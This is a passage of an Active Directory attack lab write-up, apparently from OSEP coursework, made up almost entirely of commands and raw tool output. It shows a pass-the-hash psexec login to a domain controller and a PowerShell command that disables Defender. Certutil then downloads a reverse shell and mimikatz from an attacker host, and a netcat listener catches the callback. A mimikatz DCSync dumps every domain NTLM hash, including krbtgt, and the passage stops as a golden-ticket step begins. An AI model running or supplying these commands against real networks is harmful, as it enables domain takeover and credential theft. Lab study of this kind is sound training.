Connect with the nina user and its hash captured from 172.16.243.188:
**proxychains4 impacket-psexec -hashes :1d4c153225b424290188504b9e0541eb [email protected]**
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.180:445 ... OK
[*] Requesting shares on 172.16.243.180.....
[*] Found writable share ADMIN$
[*] Uploading file bKMSKXFp.exe
[*] Opening SVCManager on 172.16.243.180.....
[*] Creating service XnXl on 172.16.243.180.....
[*] Starting service XnXl.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.180:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.180:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.180:445 ... OK
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32> whoami
nt authority\\system
C:\\Windows\\system32> cd c:\\Users\\Administrator\\Desktop
c:\\Users\\Administrator\\Desktop> more proof.txt
716455142324167230fb17bb3a3df487
c:\\Users\\Administrator\\Desktop> hostname
**dc01**
c:\\Users\\Administrator\\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.243.254
c:\\Users\\Administrator\\Desktop> **powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"**
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
c:\\Users\\Administrator\\Desktop> **certutil.exe -urlcache -f http://192.168.49.243/revshell.exe revshell.exe**
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> revshell.exe
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 63925
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\Users\\Administrator\\Desktop>certutil.exe -urlcache -f http://192.168.49.243/mimikatz.exe mimikatz.exe
certutil.exe -urlcache -f http://192.168.49.243/mimikatz.exe mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop>ping dc02.dev.final.com
ping dc02.dev.final.com
Pinging **dc02.dev.final.com [172.16.243.192]** with 32 bytes of data:
Reply from 172.16.243.192: bytes=32 time<1ms TTL=128
Reply from 172.16.243.192: bytes=32 time<1ms TTL=128
Reply from 172.16.243.192: bytes=32 time<1ms TTL=128
Reply from 172.16.243.192: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.243.192:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
DCSYNC
c:\\Users\\Administrator\\Desktop>**mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all /csv" "exit"**
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all /csv" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /domain:final.com /all /csv
[DC] 'final.com' will be the domain
[DC] 'dc01.final.com' will be the DC server
[DC] Exporting domain 'final.com'
502 krbtgt 405854caaf49b41e0e585369a001f114
1110 nina 25af00893895d3d871e625c5d4261539
500 Administrator 0474d3f0a74d30f13f1fec243e8ac3cb
1000 DC01$ 9b13612949f2bb25a5e1800de2936782
1120 ANSIBLE06$ a297ac37be95c8ae5057d188a159f7fe
1114 sqlsvc11 c0f6442ea39956aebf28219639ba9953
1115 adminWebSvc b0df1cb0819ca0b7d476d4c868175b94
1113 sqlsvc03 77f944ff6e0c0ed0c83dcef57bdf9298
1118 WEB05$ d637365b294ea57f5184cc333fa9f7eb
1119 JUMP03$ 3d73c8bfdc0056a98dfea33d42ac867a
1116 SQL03$ c52a092a8e12c89fda86819b12f06a06
1117 SQL11$ d218ba4449ccace7ecfa7f21440f42c6
1103 DEV$ d960c23b8336e64483b1e78362e15201
1109 tina 1d4c153225b424290188504b9e0541eb
1112 tommy 5ad27ee8000951e0669fab25f73f9d8a
mimikatz(commandline) # exit
Bye!
c:\\Users\\Administrator\\Desktop>mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all" "exit"
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /domain:final.com /all
[DC] 'final.com' will be the domain
[DC] 'dc01.final.com' will be the DC server
[DC] Exporting domain 'final.com'
Object RDN : final
Object RDN : LostAndFound
Object RDN : Deleted Objects
Object RDN : Users
Object RDN : Computers
Object RDN : System
Object RDN : WinsockServices
Object RDN : RpcServices
Object RDN : FileLinks
Object RDN : VolumeTable
Object RDN : ObjectMoveTable
Object RDN : Default Domain Policy
Object RDN : AppCategories
Object RDN : Meetings
Object RDN : Policies
Object RDN : User
Object RDN : Machine
Object RDN : {6AC1786C-016F-11D2-945F-00C04fB984F9}
Object RDN : User
Object RDN : Machine
Object RDN : RAS and IAS Servers Access Check
Object RDN : File Replication Service
Object RDN : Dfs-Configuration
Object RDN : IP Security
Object RDN : ipsecPolicy{72385230-70FA-11D1-864C-14A300000000}
Object RDN : ipsecISAKMPPolicy{72385231-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{72385232-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{59319BE2-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNFA{594272E2-071D-11D3-AD22-0060B0ECCA17}
Object RDN : ipsecPolicy{72385236-70FA-11D1-864C-14A300000000}
Object RDN : ipsecISAKMPPolicy{72385237-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{59319C04-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecPolicy{7238523C-70FA-11D1-864C-14A300000000}
Object RDN : ipsecISAKMPPolicy{7238523D-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{7238523E-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{59319BF3-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNFA{6A1F5C6F-72B7-11D2-ACF0-0060B0ECCA17}
Object RDN : ipsecNFA{594272FD-071D-11D3-AD22-0060B0ECCA17}
Object RDN : ipsecNegotiationPolicy{59319BDF-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNegotiationPolicy{59319BF0-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNegotiationPolicy{59319C01-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNegotiationPolicy{72385233-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNegotiationPolicy{7238523F-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNegotiationPolicy{7238523B-70FA-11D1-864C-14A300000000}
Object RDN : ipsecFilter{7238523A-70FA-11D1-864C-14A300000000}
Object RDN : ipsecFilter{72385235-70FA-11D1-864C-14A300000000}
Object RDN : ComPartitions
Object RDN : ComPartitionSets
Object RDN : WMIPolicy
Object RDN : PolicyTemplate
Object RDN : SOM
Object RDN : PolicyType
Object RDN : WMIGPO
Object RDN : DomainUpdates
Object RDN : Operations
Object RDN : ab402345-d3c3-455d-9ff7-40268a1099b6
Object RDN : bab5f54d-06c8-48de-9b87-d78b796564e4
Object RDN : f3dd09dd-25e8-4f9c-85df-12d6d2f2f2f5
Object RDN : 2416c60a-fe15-4d7a-a61e-dffd5df864d3
Object RDN : 7868d4c8-ac41-4e05-b401-776280e8e9f1
Object RDN : 860c36ed-5241-4c62-a18b-cf6ff9994173
Object RDN : 0e660ea3-8a5e-4495-9ad7-ca1bd4638f9e
Object RDN : a86fe12a-0f62-4e2a-b271-d27f601f8182
Object RDN : d85c0bfd-094f-4cad-a2b5-82ac9268475d
Object RDN : 6ada9ff7-c9df-45c1-908e-9fef2fab008a
Object RDN : 10b3ad2a-6883-4fa7-90fc-6377cbdc1b26
Object RDN : 98de1d3e-6611-443b-8b4e-f4337f1ded0b
Object RDN : f607fd87-80cf-45e2-890b-6cf97ec0e284
Object RDN : 9cac1f66-2167-47ad-a472-2a13251310e4
Object RDN : 6ff880d6-11e7-4ed1-a20f-aac45da48650
Object RDN : 446f24ea-cfd5-4c52-8346-96e170bcb912
Object RDN : 51cba88b-99cf-4e16-bef2-c427b38d0767
Object RDN : a3dac986-80e7-4e59-a059-54cb1ab43cb9
Object RDN : 293f0798-ea5c-4455-9f5d-45f33a30703b
Object RDN : 5c82b233-75fc-41b3-ac71-c69592e6bf15
Object RDN : 7ffef925-405b-440a-8d58-35e8cd6e98c3
Object RDN : 4dfbb973-8a62-4310-a90c-776e00f83222
Object RDN : 8437C3D8-7689-4200-BF38-79E4AC33DFA0
Object RDN : 7cfb016c-4f87-4406-8166-bd9df943947f
Object RDN : f7ed4553-d82b-49ef-a839-2f38a36bb069
Object RDN : 8ca38317-13a4-4bd4-806f-ebed6acb5d0c
Object RDN : 3c784009-1f57-4e2a-9b04-6915c9e71961
Object RDN : 6bcd5678-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5679-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567a-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567b-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567c-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567d-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567e-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567f-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5680-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5681-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5682-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5683-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5684-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5685-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5686-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5687-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5688-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5689-8314-11d6-977b-00c04f613221
Object RDN : 6bcd568a-8314-11d6-977b-00c04f613221
Object RDN : 6bcd568b-8314-11d6-977b-00c04f613221
Object RDN : 6bcd568c-8314-11d6-977b-00c04f613221
Object RDN : 6bcd568d-8314-11d6-977b-00c04f613221
Object RDN : 3051c66f-b332-4a73-9a20-2d6a7d6e6a1c
Object RDN : 3e4f4182-ac5d-4378-b760-0eab2de593e2
Object RDN : c4f17608-e611-11d6-9793-00c04f613221
Object RDN : 13d15cf0-e6c8-11d6-9793-00c04f613221
Object RDN : 8ddf6913-1c7b-4c59-a5af-b9ca3b3d2c4c
Object RDN : dda1d01d-4bd7-4c49-a184-46f9241b560e
Object RDN : a1789bfb-e0a2-4739-8cc0-e77d892d080a
Object RDN : 61b34cb0-55ee-4be9-b595-97810b92b017
Object RDN : 57428d75-bef7-43e1-938b-2e749f5a8d56
Object RDN : ebad865a-d649-416f-9922-456b53bbb5b8
Object RDN : 0b7fb422-3609-4587-8c2e-94b10f67d1bf
Object RDN : 2951353e-d102-4ea5-906c-54247eeec741
Object RDN : 71482d49-8870-4cb3-a438-b6fc9ec35d70
Object RDN : aed72870-bf16-4788-8ac7-22299c8207f1
Object RDN : f58300d1-b71a-4DB6-88a1-a8b9538beaca
Object RDN : 231fb90b-c92a-40c9-9379-bacfc313a3e3
Object RDN : 4aaabc3a-c416-4b9c-a6bb-4b453ab1c1f0
Object RDN : 9738c400-7795-4d6e-b19d-c16cd6486166
Object RDN : de10d491-909f-4fb0-9abb-4b7865c0fe80
Object RDN : b96ed344-545a-4172-aa0c-68118202f125
Object RDN : 4c93ad42-178a-4275-8600-16811d28f3aa
Object RDN : c88227bc-fcca-4b58-8d8a-cd3d64528a02
Object RDN : 5e1574f6-55df-493e-a671-aaeffca6a100
Object RDN : d262aae8-41f7-48ed-9f35-56bbb677573d
Object RDN : 82112ba0-7e4c-4a44-89d9-d46c9612bf91
Object RDN : c3c927a6-cc1d-47c0-966b-be8f9b63d991
Object RDN : 54afcfb9-637a-4251-9f47-4d50e7021211
Object RDN : f4728883-84dd-483c-9897-274f2ebcf11e
Object RDN : ff4f9d27-7157-4cb0-80a9-5d6f2b14c8ff
Object RDN : 83C53DA7-427E-47A4-A07A-A324598B88F7
Object RDN : C81FC9CC-0130-4FD1-B272-634D74818133
Object RDN : E5F9E791-D96D-4FC9-93C9-D53E1DC439BA
Object RDN : e6d5fd00-385d-4e65-b02d-9da3493ed850
Object RDN : 3a6b3fbf-3168-4312-a10d-dd5b3393952d
Object RDN : 7F950403-0AB3-47F9-9730-5D7B0269F9BD
Object RDN : 434bb40d-dbc9-4fe7-81d4-d57229f7b080
Object RDN : A0C238BA-9E30-4EE6-80A6-43F731E9A5CD
Object RDN : Windows2003Update
Object RDN : ActiveDirectoryUpdate
Object RDN : Password Settings Container
Object RDN : PSPs
Object RDN : Domain Controllers
Object RDN : Infrastructure
Object RDN : ForeignSecurityPrincipals
Object RDN : Program Data
Object RDN : Microsoft
Object RDN : NTDS Quotas
Object RDN : Managed Service Accounts
Object RDN : TPM Devices
Object RDN : Keys
Object RDN : Guest
** SAM ACCOUNT **
SAM Username : Guest
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-501
Object Relative ID : 501
Credentials:
Object RDN : Builtin
Object RDN : S-1-5-4
Object RDN : S-1-5-11
Object RDN : Remote Desktop Users
** SAM ACCOUNT **
SAM Username : Remote Desktop Users
Object Security ID : S-1-5-32-555
Object Relative ID : 555
Credentials:
Object RDN : Network Configuration Operators
** SAM ACCOUNT **
SAM Username : Network Configuration Operators
Object Security ID : S-1-5-32-556
Object Relative ID : 556
Credentials:
Object RDN : Performance Monitor Users
** SAM ACCOUNT **
SAM Username : Performance Monitor Users
Object Security ID : S-1-5-32-558
Object Relative ID : 558
Credentials:
Object RDN : Performance Log Users
** SAM ACCOUNT **
SAM Username : Performance Log Users
Object Security ID : S-1-5-32-559
Object Relative ID : 559
Credentials:
Object RDN : Distributed COM Users
** SAM ACCOUNT **
SAM Username : Distributed COM Users
Object Security ID : S-1-5-32-562
Object Relative ID : 562
Credentials:
Object RDN : S-1-5-17
Object RDN : IIS_IUSRS
** SAM ACCOUNT **
SAM Username : IIS_IUSRS
Object Security ID : S-1-5-32-568
Object Relative ID : 568
Credentials:
Object RDN : Cryptographic Operators
** SAM ACCOUNT **
SAM Username : Cryptographic Operators
Object Security ID : S-1-5-32-569
Object Relative ID : 569
Credentials:
Object RDN : Event Log Readers
** SAM ACCOUNT **
SAM Username : Event Log Readers
Object Security ID : S-1-5-32-573
Object Relative ID : 573
Credentials:
Object RDN : Certificate Service DCOM Access
** SAM ACCOUNT **
SAM Username : Certificate Service DCOM Access
Object Security ID : S-1-5-32-574
Object Relative ID : 574
Credentials:
Object RDN : RDS Remote Access Servers
** SAM ACCOUNT **
SAM Username : RDS Remote Access Servers
Object Security ID : S-1-5-32-575
Object Relative ID : 575
Credentials:
Object RDN : RDS Endpoint Servers
** SAM ACCOUNT **
SAM Username : RDS Endpoint Servers
Object Security ID : S-1-5-32-576
Object Relative ID : 576
Credentials:
Object RDN : RDS Management Servers
** SAM ACCOUNT **
SAM Username : RDS Management Servers
Object Security ID : S-1-5-32-577
Object Relative ID : 577
Credentials:
Object RDN : Hyper-V Administrators
** SAM ACCOUNT **
SAM Username : Hyper-V Administrators
Object Security ID : S-1-5-32-578
Object Relative ID : 578
Credentials:
Object RDN : Access Control Assistance Operators
** SAM ACCOUNT **
SAM Username : Access Control Assistance Operators
Object Security ID : S-1-5-32-579
Object Relative ID : 579
Credentials:
Object RDN : Remote Management Users
** SAM ACCOUNT **
SAM Username : Remote Management Users
Object Security ID : S-1-5-32-580
Object Relative ID : 580
Credentials:
Object RDN : Storage Replica Administrators
** SAM ACCOUNT **
SAM Username : Storage Replica Administrators
Object Security ID : S-1-5-32-582
Object Relative ID : 582
Credentials:
Object RDN : Domain Computers
** SAM ACCOUNT **
SAM Username : Domain Computers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-515
Object Relative ID : 515
Credentials:
Object RDN : Cert Publishers
** SAM ACCOUNT **
SAM Username : Cert Publishers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-517
Object Relative ID : 517
Credentials:
Object RDN : Domain Users
** SAM ACCOUNT **
SAM Username : Domain Users
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-513
Object Relative ID : 513
Credentials:
Object RDN : Domain Guests
** SAM ACCOUNT **
SAM Username : Domain Guests
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-514
Object Relative ID : 514
Credentials:
Object RDN : RAS and IAS Servers
** SAM ACCOUNT **
SAM Username : RAS and IAS Servers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-553
Object Relative ID : 553
Credentials:
Object RDN : Incoming Forest Trust Builders
** SAM ACCOUNT **
SAM Username : Incoming Forest Trust Builders
Object Security ID : S-1-5-32-557
Object Relative ID : 557
Credentials:
Object RDN : Terminal Server License Servers
** SAM ACCOUNT **
SAM Username : Terminal Server License Servers
Object Security ID : S-1-5-32-561
Object Relative ID : 561
Credentials:
Object RDN : Users
** SAM ACCOUNT **
SAM Username : Users
Object Security ID : S-1-5-32-545
Object Relative ID : 545
Credentials:
Object RDN : Guests
** SAM ACCOUNT **
SAM Username : Guests
Object Security ID : S-1-5-32-546
Object Relative ID : 546
Credentials:
Object RDN : Group Policy Creator Owners
** SAM ACCOUNT **
SAM Username : Group Policy Creator Owners
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-520
Object Relative ID : 520
Credentials:
Object RDN : Pre-Windows 2000 Compatible Access
** SAM ACCOUNT **
SAM Username : Pre-Windows 2000 Compatible Access
Object Security ID : S-1-5-32-554
Object Relative ID : 554
Credentials:
Object RDN : S-1-5-9
Object RDN : Windows Authorization Access Group
** SAM ACCOUNT **
SAM Username : Windows Authorization Access Group
Object Security ID : S-1-5-32-560
Object Relative ID : 560
Credentials:
Object RDN : 6E157EDF-4E72-4052-A82A-EC3F91021A22
Object RDN : Allowed RODC Password Replication Group
** SAM ACCOUNT **
SAM Username : Allowed RODC Password Replication Group
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-571
Object Relative ID : 571
Credentials:
Object RDN : Enterprise Read-only Domain Controllers
** SAM ACCOUNT **
SAM Username : Enterprise Read-only Domain Controllers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-498
Object Relative ID : 498
Credentials:
Object RDN : Denied RODC Password Replication Group
** SAM ACCOUNT **
SAM Username : Denied RODC Password Replication Group
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-572
Object Relative ID : 572
Credentials:
Object RDN : Cloneable Domain Controllers
** SAM ACCOUNT **
SAM Username : Cloneable Domain Controllers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-522
Object Relative ID : 522
Credentials:
Object RDN : Protected Users
** SAM ACCOUNT **
SAM Username : Protected Users
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-525
Object Relative ID : 525
Credentials:
Object RDN : DnsAdmins
** SAM ACCOUNT **
SAM Username : DnsAdmins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1101
Object Relative ID : 1101
Credentials:
Object RDN : DnsUpdateProxy
** SAM ACCOUNT **
SAM Username : DnsUpdateProxy
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1102
Object Relative ID : 1102
Credentials:
Object RDN : MicrosoftDNS
Object RDN : DFSR-GlobalSettings
Object RDN : Domain System Volume
Object RDN : RootDNSServers
Object RDN : Content
Object RDN : @
Object RDN : SYSVOL Share
Object RDN : a.root-servers.net
Object RDN : Topology
Object RDN : DC01
Object RDN : b.root-servers.net
Object RDN : c.root-servers.net
Object RDN : Domain System Volume
Object RDN : d.root-servers.net
Object RDN : e.root-servers.net
Object RDN : f.root-servers.net
Object RDN : g.root-servers.net
Object RDN : h.root-servers.net
Object RDN : i.root-servers.net
Object RDN : j.root-servers.net
Object RDN : k.root-servers.net
Object RDN : l.root-servers.net
Object RDN : m.root-servers.net
Object RDN : Server
Object RDN : DFSR-LocalSettings
Object RDN : SYSVOL Subscription
Object RDN : AdminSDHolder
Object RDN : Schema Admins
** SAM ACCOUNT **
SAM Username : Schema Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-518
Object Relative ID : 518
Credentials:
Object RDN : Key Admins
** SAM ACCOUNT **
SAM Username : Key Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-526
Object Relative ID : 526
Credentials:
Object RDN : Enterprise Key Admins
** SAM ACCOUNT **
SAM Username : Enterprise Key Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-527
Object Relative ID : 527
Credentials:
Object RDN : Enterprise Admins
** SAM ACCOUNT **
SAM Username : Enterprise Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-519
Object Relative ID : 519
Credentials:
Object RDN : Server Operators
** SAM ACCOUNT **
SAM Username : Server Operators
Object Security ID : S-1-5-32-549
Object Relative ID : 549
Credentials:
Object RDN : Print Operators
** SAM ACCOUNT **
SAM Username : Print Operators
Object Security ID : S-1-5-32-550
Object Relative ID : 550
Credentials:
Object RDN : Backup Operators
** SAM ACCOUNT **
SAM Username : Backup Operators
Object Security ID : S-1-5-32-551
Object Relative ID : 551
Credentials:
Object RDN : Account Operators
** SAM ACCOUNT **
SAM Username : Account Operators
Object Security ID : S-1-5-32-548
Object Relative ID : 548
Credentials:
Object RDN : Administrators
** SAM ACCOUNT **
SAM Username : Administrators
Object Security ID : S-1-5-32-544
Object Relative ID : 544
Credentials:
Object RDN : Replicator
** SAM ACCOUNT **
SAM Username : Replicator
Object Security ID : S-1-5-32-552
Object Relative ID : 552
Credentials:
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-502
Object Relative ID : 502
Credentials:
Hash NTLM: 405854caaf49b41e0e585369a001f114
Object RDN : Read-only Domain Controllers
** SAM ACCOUNT **
SAM Username : Read-only Domain Controllers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-521
Object Relative ID : 521
Credentials:
Object RDN : Domain Controllers
** SAM ACCOUNT **
SAM Username : Domain Controllers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-516
Object Relative ID : 516
Credentials:
Object RDN : DomainDnsZones
Object RDN : Configuration
Object RDN : ForestDnsZones
Object RDN : FinalAdmins
Object RDN : FinalUsers
Object RDN : FinalUsers
Object RDN : FinalServices
Object RDN : FinalComputers
Object RDN : FinalWin
Object RDN : FinalLinux
Object RDN : SQLAdmins
** SAM ACCOUNT **
SAM Username : SQLAdmins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1104
Object Relative ID : 1104
Credentials:
Object RDN : FinalGroups
Object RDN : Mgt
Object RDN : LinuxAdmin
** SAM ACCOUNT **
SAM Username : LinuxAdmin
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1108
Object Relative ID : 1108
Credentials:
Object RDN : Domain Admins
** SAM ACCOUNT **
SAM Username : Domain Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-512
Object Relative ID : 512
Credentials:
Object RDN : MgtUsers
** SAM ACCOUNT **
SAM Username : MgtUsers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1106
Object Relative ID : 1106
Credentials:
Object RDN : LinuxUsers
** SAM ACCOUNT **
SAM Username : LinuxUsers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1107
Object Relative ID : 1107
Credentials:
Object RDN : WebAdmins
** SAM ACCOUNT **
SAM Username : WebAdmins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1105
Object Relative ID : 1105
Credentials:
Object RDN : Machine
Object RDN : User
Object RDN : {A4D14608-3D05-42F1-9325-07EA5A08468C}
Object RDN : Machine
Object RDN : User
Object RDN : SQLServer
Object RDN : {4BA6AC26-8B23-4F4F-9DC7-9B248BEBE7E4}
Object RDN : Machine
Object RDN : User
Object RDN : WebServer
Object RDN : {34BE65EC-7DBA-46FB-B6B1-46094400C0E6}
Object RDN : dev
Object RDN : BCKUPKEY_78b1c7c3-c251-4496-baea-c00bd9193fc5 Secret
Object RDN : BCKUPKEY_P Secret
Object RDN : BCKUPKEY_8c4175f2-282f-4270-a8ce-1f65ff66f14c Secret
Object RDN : BCKUPKEY_PREFERRED Secret
Object RDN : Nina
** SAM ACCOUNT **
SAM Username : nina
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1110
Object Relative ID : 1110
Credentials:
Hash NTLM: 25af00893895d3d871e625c5d4261539
Object RDN : Machine
Object RDN : User
Object RDN : {D231BF9D-4D1A-41E3-8C02-8CD2129362A8}
Object RDN : Machine
Object RDN : User
Object RDN : MgtServer
Object RDN : {2315106E-5A95-4E22-A6F9-807AE48D4EC0}
Object RDN : {31B2F340-016D-11D2-945F-00C04FB984F9}
Object RDN : RID Manager$
Object RDN : RID Set
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-500
Object Relative ID : 500
Credentials:
Hash NTLM: 0474d3f0a74d30f13f1fec243e8ac3cb
Object RDN : DC01
** SAM ACCOUNT **
SAM Username : DC01$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1000
Object Relative ID : 1000
Credentials:
Hash NTLM: 9b13612949f2bb25a5e1800de2936782
Object RDN : ANSIBLE06
** SAM ACCOUNT **
SAM Username : ANSIBLE06$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1120
Object Relative ID : 1120
Credentials:
Hash NTLM: a297ac37be95c8ae5057d188a159f7fe
Object RDN : sqlsvc11
** SAM ACCOUNT **
SAM Username : sqlsvc11
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1114
Object Relative ID : 1114
Credentials:
Hash NTLM: c0f6442ea39956aebf28219639ba9953
Object RDN : adminWebSvc
** SAM ACCOUNT **
SAM Username : adminWebSvc
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1115
Object Relative ID : 1115
Credentials:
Hash NTLM: b0df1cb0819ca0b7d476d4c868175b94
Object RDN : sqlsvc03
** SAM ACCOUNT **
SAM Username : sqlsvc03
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1113
Object Relative ID : 1113
Credentials:
Hash NTLM: 77f944ff6e0c0ed0c83dcef57bdf9298
Object RDN : WEB05
** SAM ACCOUNT **
SAM Username : WEB05$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1118
Object Relative ID : 1118
Credentials:
Hash NTLM: d637365b294ea57f5184cc333fa9f7eb
Object RDN : JUMP03
** SAM ACCOUNT **
SAM Username : JUMP03$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1119
Object Relative ID : 1119
Credentials:
Hash NTLM: 3d73c8bfdc0056a98dfea33d42ac867a
Object RDN : SQL03
** SAM ACCOUNT **
SAM Username : SQL03$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1116
Object Relative ID : 1116
Credentials:
Hash NTLM: c52a092a8e12c89fda86819b12f06a06
Object RDN : SQL11
** SAM ACCOUNT **
SAM Username : SQL11$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1117
Object Relative ID : 1117
Credentials:
Hash NTLM: d218ba4449ccace7ecfa7f21440f42c6
Object RDN : dev.final.com
Object RDN : DEV$
** SAM ACCOUNT **
SAM Username : DEV$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1103
Object Relative ID : 1103
Credentials:
Hash NTLM: d960c23b8336e64483b1e78362e15201
Object RDN : Tina
** SAM ACCOUNT **
SAM Username : tina
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1109
Object Relative ID : 1109
Credentials:
Hash NTLM: 1d4c153225b424290188504b9e0541eb
Object RDN : Tommy
** SAM ACCOUNT **
SAM Username : tommy
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1112
Object Relative ID : 1112
Credentials:
Hash NTLM: 5ad27ee8000951e0669fab25f73f9d8a
mimikatz(commandline) # exit
Bye!
Use a golden ticket to gain access to 172.16.243.192:
